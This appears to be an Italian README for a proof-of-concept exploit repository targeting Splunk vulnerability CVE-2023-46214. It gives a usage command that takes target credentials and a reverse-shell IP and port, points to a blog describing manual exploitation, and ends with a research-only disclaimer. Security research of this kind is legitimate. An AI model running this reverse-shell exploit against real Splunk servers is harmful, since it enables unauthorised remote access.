
Exploit proof of concept per CVE-2023-46214, SVD-2023-1104

L'URL dell'istanza Splunk, il nome utente, la password, l'IP della reverse shell e la porta sono tutti richiesti come parametri da riga di comando. Per esempio:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
Ho scritto un post sul blog che descrive la metodologia utilizzata per scoprire questa vulnerabilità. Se riscontri problemi con lo script, il blog potrebbe esserti utile in quanto descrive i passaggi manuali per lo sfruttamento.
Analisi di CVE-2023-46214 + PoC
Lo script Proof of Concept (PoC) fornito in questo repository serve esclusivamente a scopi educativi e di ricerca. Il suo scopo è mostrare una specifica vulnerabilità e aiutare a comprendere i rischi per la sicurezza associati.
Qualsiasi utilizzo di questo script per attività non autorizzate, incluse ma non limitate a accesso non autorizzato ai sistemi, test non autorizzati o altre forme di uso improprio, è inequivocabilmente vietato.
I creatori e i contributor di questo repository declinano ogni responsabilità per l'uso improprio o per qualsiasi danno o perdita derivante dall'uso di questo script. Utilizzando questo script, acconsenti a usarlo in modo responsabile e a tuo rischio.